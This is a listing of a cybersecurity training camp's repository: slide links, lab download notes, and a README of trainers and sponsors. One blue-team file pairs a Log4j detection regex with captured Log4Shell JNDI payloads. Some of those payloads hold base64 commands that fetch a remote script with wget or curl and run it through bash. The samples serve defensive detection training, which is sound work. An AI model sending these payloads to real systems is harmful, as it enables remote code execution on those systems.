├── MCC2022 ├── AD Hvking - Hoj3n&Aniq │ ├── AD--Slides MCC 2022.pdf │ └── Writeup-CTD-MCC-2022.pdf ├── Blueteam Warrior - Ts. Syahmi │ ├── ReHack-2022-MCC-Blueteam.pdf │ └── sample-regex-for-log4j.txt ├── Fuzzing - nafiez │ ├── Windows_Fuzzing_Summary.pdf │ └── notes.txt └── Web-Pentest-101 -r00tpgp │ ├── BAE Web Hacking 101 - MyCC.pdf │ └── README.me.txt ├── MCC2023 ├── Fareed - DFIR │ └── notes.txt ├── Ghimau - Nmap │ ├── lab_exercise.pdf │ ├── notes.txt │ └── slide.pdf ├── Jas and Shah - Burpsuite │ ├── Burp_Suite_Extension_Training_.pdf │ └── notes.txt └── Shahril and Jani - Redteam │ └── Red_Teaming_-_Adversarial_Attack_Simulation.pdf ├── MCC2024 ├── Crash Course IoT - Naja and Fitri │ ├── Latest-Crash Course_IoT and Hardware Hacking.pdf │ └── mcc2024badge.ino.elf ├── RE - Azlan │ ├── README.md.docx │ ├── challenge.zip │ ├── img │ │ └── visualstudiosetup.png │ ├── slides │ │ ├── 01_-_Basic_C_Programming.pdf │ │ ├── 02_-_Assembly_Programming.pdf │ │ ├── 03_-_PE_File_Format.pdf │ │ └── 04_-_Debugging_Tools_-_x64dbg.pdf │ └── supplements │ │ ├── IntelCodeTable.pdf │ │ ├── PE101.zip │ │ ├── PE_Format_-_Ero_Carrera.pdf │ │ ├── PE_Format_-_openrce-org.pdf │ │ ├── PE_Format_Walkthrough-Ero_Carrera.pdf │ │ ├── Reverse_Engineering_for_Beginners-en-lite.pdf │ │ ├── X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf │ │ ├── asmWorkbook.pdf │ │ ├── intel-manual-1997.pdf │ │ ├── pe101-Ange_Albertini.pdf │ │ └── pe102-Ange_Albertini.pdf ├── Threat Intel Intro - Ms Ain │ └── CAREER JOURNEY EVOLVING WITH THE THREAT.pptx └── Web VR - Rempah │ ├── Slide and Coursebook │ ├── MCC2024 - Coursebook.docx │ ├── MCC2024 - Coursebook.pdf │ ├── MCC2024 - Epilogue.pdf │ ├── MCC2024 - Slide.pdf │ └── MCC2024 - Slide.pptx │ └── notes.txt └── README.md /MCC2022/AD Hvking - Hoj3n&Aniq/AD--Slides MCC 2022.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2022/AD Hvking - Hoj3n&Aniq/AD--Slides MCC 2022.pdf -------------------------------------------------------------------------------- /MCC2022/AD Hvking - Hoj3n&Aniq/Writeup-CTD-MCC-2022.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2022/AD Hvking - Hoj3n&Aniq/Writeup-CTD-MCC-2022.pdf -------------------------------------------------------------------------------- /MCC2022/Blueteam Warrior - Ts. Syahmi/ReHack-2022-MCC-Blueteam.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2022/Blueteam Warrior - Ts. Syahmi/ReHack-2022-MCC-Blueteam.pdf -------------------------------------------------------------------------------- /MCC2022/Blueteam Warrior - Ts. Syahmi/sample-regex-for-log4j.txt: -------------------------------------------------------------------------------- 1 | (?\$?\{?\${(jndi|env|:|lower|upper):(\w+|\W+)(\w+|\W+)(\w+|\W)(\S+}.|.\w+[^\/]+\S+).+}) 2 | 3 | GET /${jndi:ldaps://lx-ffff23f2fe231800f13eb56100000000a26cd7.probe001.log4j.leakix.net:4444/b}?${jndi:ldaps://lx-ffff23f2fe231801f13eb5610000000084b32b.probe001.log4j.leakix.net:4444/b}=${jndi:ldaps://lx-ffff23f2fe231802f13eb56100000000fd1374.probe001.log4j.leakix.net:4444/b}" HTTP/1.1 4 | 5 | GET /${jndi:ldaps://ea372994.probe001.log4j.leakix.net:9200/b}?${jndi:ldaps://ea372994.probe001.log4j.leakix.net:9200/b}=${jndi:ldaps://ea372994.probe001.log4j.leakix.net:9200/b} HTTP/1.1 kjoijhijojoj 6 | 7 | ${jndi:ldap://${env:JAVA_VERSION}.c6v09ky2vtc000092300gdpor3hyyyyyb.interactsh.com} 8 | 9 | ${jndi:ldap://${env:JAVA_VERSION}.c6v09ky2vtc000092300gdpor3hyyyyyb.interactsh.com}\r\n 10 | 11 | ${jndi:ldap://${hostName}.c6rm7maum5n0754i44qgcg5s3wayyytkw.interactsh.com/a}", 12 | 13 | ${jndi:ldap://213.152.161.239:62582/a12222}","ClientSSLCi 14 | 15 | ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass}, Client: Java, Ap 16 | 17 | ${jndi:ldap://155.138.206.215:20008/config}, Client: Chrome, 18 | 19 | ${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==} 20 | 21 | ${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164.160:8081/w} 22 | 23 | ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j[.]bin${upper:a}ryedge[.]io:80/callback} 24 | 25 | ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback} 26 | 27 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNS4yMjguMjUuNzQ6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMzUuMjI4LjI1Ljc0OjgwKXxiYXNo}:" 28 | 29 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNS4yMjguMTQuMTM2OjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzM1LjIyOC4xNC4xMzY6ODApfGJhc2g=} 30 | 31 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNS4yMjguOS4xNzM6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzM1LjIyOC45LjE3Mzo0NDMpfGJhc2g=} 32 | 33 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6qia64pu892o2ofnpigcg41azaycz384.interactsh.com} 34 | 35 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6qia64pu892o2ofnpigcg41c3yynf5oh.interactsh.com} 36 | 37 | ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://3.${hostName}.c6qia64pu892o2ofnpigcg41c8yybsboa.interactsh.com} -------------------------------------------------------------------------------- /MCC2022/Fuzzing - nafiez/Windows_Fuzzing_Summary.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2022/Fuzzing - nafiez/Windows_Fuzzing_Summary.pdf -------------------------------------------------------------------------------- /MCC2022/Fuzzing - nafiez/notes.txt: -------------------------------------------------------------------------------- 1 | Please download the lab and other materials for this workshop here: https://drive.google.com/file/d/14ZEhRkW2PnPqdG0IOr77ywYIsvN9GiRM/view?usp=sharing 2 | 3 | If there's any error, please contact hello+mcc@rehack.my or crews@cybercamp.my 4 | -------------------------------------------------------------------------------- /MCC2022/Web-Pentest-101 -r00tpgp/BAE Web Hacking 101 - MyCC.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2022/Web-Pentest-101 -r00tpgp/BAE Web Hacking 101 - MyCC.pdf -------------------------------------------------------------------------------- /MCC2022/Web-Pentest-101 -r00tpgp/README.me.txt: -------------------------------------------------------------------------------- 1 | For training materials, the user need to download: 2 | 3 | 1. Bee box - https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/ 4 | 2. DVWA - https://github.com/digininja/DVWA or ISO - https://www.vulnhub.com/entry/damn-vulnerable-web-application-dvwa-107,43/ -------------------------------------------------------------------------------- /MCC2023/Fareed - DFIR/notes.txt: -------------------------------------------------------------------------------- 1 | Please download it here: https://drive.google.com/file/d/1yhq9O_sKyhYuTsDQ39MH_k2XDtyafNJY/view?usp=sharing 2 | 3 | If there's any error, please contact hello+mcc@rehack.my or crews@cybercamp.my 4 | -------------------------------------------------------------------------------- /MCC2023/Ghimau - Nmap/lab_exercise.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2023/Ghimau - Nmap/lab_exercise.pdf -------------------------------------------------------------------------------- /MCC2023/Ghimau - Nmap/notes.txt: -------------------------------------------------------------------------------- 1 | Please download the lab and other materials for this workshop here: https://drive.google.com/file/d/1-X6w1sipXqfIchJQZMUM5iHs5eVOFN7J/view?usp=drive_link 2 | 3 | Can follow Youtube @mastaghimau for more walkthrough https://www.youtube.com/channel/UClQry91GlChQfNpTE_XF4aw 4 | 5 | If there's any error, please contact hello+mcc@rehack.my or crews@cybercamp.my 6 | -------------------------------------------------------------------------------- /MCC2023/Ghimau - Nmap/slide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2023/Ghimau - Nmap/slide.pdf -------------------------------------------------------------------------------- /MCC2023/Jas and Shah - Burpsuite/Burp_Suite_Extension_Training_.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2023/Jas and Shah - Burpsuite/Burp_Suite_Extension_Training_.pdf -------------------------------------------------------------------------------- /MCC2023/Jas and Shah - Burpsuite/notes.txt: -------------------------------------------------------------------------------- 1 | The lab OVA file can be downloaded here: https://drive.google.com/file/d/1EddPpPzWjdtShO9QbTW8d01UHp8iAbGd/view?usp=drive_link 2 | 3 | If there's any error, please contact hello+mcc@rehack.my or crews@cybercamp.my 4 | -------------------------------------------------------------------------------- /MCC2023/Shahril and Jani - Redteam/Red_Teaming_-_Adversarial_Attack_Simulation.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2023/Shahril and Jani - Redteam/Red_Teaming_-_Adversarial_Attack_Simulation.pdf -------------------------------------------------------------------------------- /MCC2024/Crash Course IoT - Naja and Fitri/Latest-Crash Course_IoT and Hardware Hacking.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/Crash Course IoT - Naja and Fitri/Latest-Crash Course_IoT and Hardware Hacking.pdf -------------------------------------------------------------------------------- /MCC2024/Crash Course IoT - Naja and Fitri/mcc2024badge.ino.elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/Crash Course IoT - Naja and Fitri/mcc2024badge.ino.elf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/README.md.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/README.md.docx -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/challenge.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/challenge.zip -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/img/visualstudiosetup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/img/visualstudiosetup.png -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/slides/01_-_Basic_C_Programming.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/slides/01_-_Basic_C_Programming.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/slides/02_-_Assembly_Programming.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/slides/02_-_Assembly_Programming.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/slides/03_-_PE_File_Format.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/slides/03_-_PE_File_Format.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/slides/04_-_Debugging_Tools_-_x64dbg.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/slides/04_-_Debugging_Tools_-_x64dbg.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/IntelCodeTable.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/IntelCodeTable.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/PE101.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/PE101.zip -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/PE_Format_-_Ero_Carrera.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/PE_Format_-_Ero_Carrera.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/PE_Format_-_openrce-org.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/PE_Format_-_openrce-org.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/PE_Format_Walkthrough-Ero_Carrera.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/PE_Format_Walkthrough-Ero_Carrera.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/Reverse_Engineering_for_Beginners-en-lite.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/Reverse_Engineering_for_Beginners-en-lite.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/asmWorkbook.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/asmWorkbook.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/intel-manual-1997.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/intel-manual-1997.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/pe101-Ange_Albertini.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/pe101-Ange_Albertini.pdf -------------------------------------------------------------------------------- /MCC2024/RE - Azlan/supplements/pe102-Ange_Albertini.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/RE - Azlan/supplements/pe102-Ange_Albertini.pdf -------------------------------------------------------------------------------- /MCC2024/Threat Intel Intro - Ms Ain/CAREER JOURNEY EVOLVING WITH THE THREAT.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/Threat Intel Intro - Ms Ain/CAREER JOURNEY EVOLVING WITH THE THREAT.pptx -------------------------------------------------------------------------------- /MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Coursebook.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Coursebook.docx -------------------------------------------------------------------------------- /MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Coursebook.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Coursebook.pdf -------------------------------------------------------------------------------- /MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Epilogue.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Epilogue.pdf -------------------------------------------------------------------------------- /MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Slide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Slide.pdf -------------------------------------------------------------------------------- /MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Slide.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rehackxyz/MCC/9bd7320e590332b5bbb8d43f748eb8e635a7be7f/MCC2024/Web VR - Rempah/Slide and Coursebook/MCC2024 - Slide.pptx -------------------------------------------------------------------------------- /MCC2024/Web VR - Rempah/notes.txt: -------------------------------------------------------------------------------- 1 | The size of the files are big. Please download it from the following: 2 | 3 | slim - without any docker images, you need to execute ./bin/prepare for each module 4 | https://drive.google.com/file/d/1TdnIwv8zU5edJ74l_QBegCSncWFVQbAe/view?usp=drive_link 5 | 6 | full - a fully deployed docker, all you need is just to run ./bin/start 7 | https://drive.google.com/file/d/1AEI62iBJJrszhoRxQNj7E6oaSIxVeo9k/view?usp=drive_link 8 | 9 | code-only - only for the hardcore. source codes with the docker files are in here, then figure it out how to run them. 10 | https://drive.google.com/file/d/1DXa-07zAvnNzz89LUcagc4XDZCkMgfIi/view?usp=drive_link 11 | 12 | If there's any error, please contact hello+mcc@rehack.my or crews@cybercamp.my 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Malaysia Cybersecurity Camp (MCC) 2 | MCC is a 4-days and 3-nights 'summer' camp organised by RE:HACK and Nanosec Asia focusing on cybersecurity topics for students and beginners in Malaysia. Our objectives are simple but impactful to the industry: 3 | * Identifying local unicorns 4 | * Increase their knowledge through expert-led bootcamps/trainings as well as get to know experts within the field 5 | * To bridge the skills divide between professionals and learners. 6 | * To bring them up to par with other talented students worldwide 7 | * To produce quality graduates ready to enter the workforce with minimal training 8 | 9 | Website: https://cybercamp.my/ \ 10 | Twitter/X: https://x.com/CybercampMY 11 | 12 | # Support 13 | Starting from 2024, MCC event is included as one of the programs initiated by RE:HACK, where we make use of the grant received from MOROS NET.\ 14 | Ref: https://morosnet.com/project/rehack-malaysia-cybersecurity-camp/ 15 | 16 | 17 | ## MCC2024 - STEP UP 18 | 19 | 20 | Date: 29 Nov - 2 Dec 2024\ 21 | Location: Pacific Regency Beach Resort Port Dickson 22 | 23 | Reference: https://cybercamp.my/mcc2024-step-up/ 24 | 25 | ### MCC2024 Trainers: 26 | * Guest speaker: Ms Ain from Cybersecurity Malaysia 27 | * Padlock Mechanisms: Max 28 | * Crash Course: IoT and Hardware Hacking: Naja and Fitri 29 | * Reverse Engineering Fundamentals: Azlan 30 | * Web Application Vulnerability Research: Ramadhan (Rempah) 31 | 32 | ### MCC2024 Sponsors: 33 | 34 | **0day Hacker** 35 | * [MOROS NET](https://morosnet.com/) 36 | 37 | **RedHacker** 38 | * [AKATI Sekurity](https://www.akati.com/) 39 | * [Nexagate](https://www.nexagate.com/) 40 | * [Google Cloud Security](https://cloud.google.com/security/) 41 | * [Velum Labs](https://www.velumlabs.com/) 42 | * [Intelligence PC](https://www.intelligencepc.com/) 43 | 44 | **BlueHacker** 45 | * [APNIC](https://www.apnic.net/) 46 | * Anonymous sponsors 47 | 48 | **PurpleHacker** 49 | * [ASK Pentest](https://www.ask-pentest.com/) 50 | * [RunCloud](https://runcloud.io/) 51 | * [NLab Security](https://zeifan.my/) 52 | * Anonymous sponsors 53 | 54 | **Community** 55 | * [SANS Institute](https://www.sans.org/cyber-ranges/) 56 | * [CompTIA](https://www.comptia.org/) 57 | * [SYNTX](https://syntx.com.my/) 58 | 59 | ### MCC2024 Supporting Organisations and Partners: 60 | * [NACSA](https://www.nacsa.gov.my/) 61 | * [CSM](https://www.cybersecurity.my/) 62 | * [RE:UN10N CTF TEAM](https://x.com/reun10n_) 63 | * [Rectifyq](https://www.linkedin.com/company/rectifyq) 64 | * [Hack in the Box](https://www.hitb.org/) 65 | 66 | ## MCC2023 - SPEAK OUT 67 | 68 | 69 | Date: 8 Dec 2023 - 11 Dec 2023\ 70 | Location: Thistle Port Dickson, Negeri Sembilan 71 | 72 | ### MCC2023 Trainers: 73 | * Guest speaker: Rizki Boisandie 74 | * Masta Ghimau - Cosmology beyond Nmap 75 | * Fareed - Digital Forensics and Incident Response for Beginners 76 | * Jasveer & Shah - BurpSuite Extension Development 77 | * Shahril & Jani - Red Teaming - Adversarial Attack Simulation 78 | 79 | Reference: https://cybercamp.my/mcc2023-the-journey-begins/ 80 | 81 | ### MCC2023 Sponsors: 82 | 83 | **RedHacker** 84 | * [Velum Labs](https://www.velumlabs.com/) 85 | * [Akati Security](https://www.akati.com/) 86 | * [Nexagate](https://www.nexagate.com/) 87 | 88 | **BlueHacker** 89 | * [APNIC](https://www.apnic.net/) 90 | * Aiden Secure 91 | * Anonymous sponsors 92 | 93 | **PurpleHacker** 94 | * [ASK Pentest](https://www.ask-pentest.com/) 95 | * [Cyber8Lab](https://cyber8lab.com/) 96 | * Anonymous sponsors 97 | 98 | **Community** 99 | * [TCM Security](https://tcm-sec.com/) 100 | * [SYNTX Sdn Bhd](https://www.syntx.com.my/) 101 | 102 | 103 | ### MCC2023 Supporting Organisations and Partners: 104 | * [National Cyber Security Agency (NACSA)](https://www.nacsa.gov.my/) 105 | * [Cybersecurity Malaysia](https://www.cybersecurity.my/) 106 | * [BadApe NFT](https://www.instagram.com/badape.nft/) 107 | * [RAWSEC](https://rawsec.my/) 108 | * [OWASP KL Chapter](https://owasp.org/www-chapter-kuala-lumpur/) 109 | 110 | ## MCC2022 - The First Edition 111 | 112 | 113 | Date: 2 Dec 2022 - 5 Dec 2022\ 114 | Location: Thistle Port Dickson, Negeri Sembilan 115 | 116 | ### MCC2022 Trainers: 117 | * Nafiez - Fuzzing for Beginners 118 | * Rizan - Web Application Penetration Testing 101 with BurpSuite Pro 119 | * Syahmi - What does it take to become the next Blue Team expert? 120 | * Ali & Aniq - Automated scanning is boring. Let's learn Active Directory Hacking. 121 | 122 | Reference: https://cybercamp.my/mcc-2022-the-first-edition/ 123 | 124 | ### MCC2022 Sponsors: 125 | * [Akati Security](https://www.akati.com/) 126 | * [Intelligence PC Sdn Bhd](https://www.intelligencepc.com/) 127 | * [MyCrypto Sdn Bhd - Now is Secure Insight Sdn Bhd](https://www.secureinsight.my/) 128 | * [APNIC](https://www.apnic.net/) 129 | * [BAE Systems Digital Intelligence](https://www.baesystems.com/en/digital/home) 130 | * [PentesterLab](https://pentesterlab.com/) 131 | * [PortSwigger](https://portswigger.net/) 132 | 133 | ### MCC2022 Supporting Organisations and Partners: 134 | * [Cybersecurity Malaysia](https://www.cybersecurity.my/) 135 | * [MIMM Travel & Tours](https://mimmtravel.com/) 136 | * [BadApe NFT](https://www.instagram.com/badape.nft/) 137 | * [SYNTX Sdn Bhd](https://www.syntx.com.my/) 138 | * [Hack in the Box](https://www.hitb.org/) 139 | --------------------------------------------------------------------------------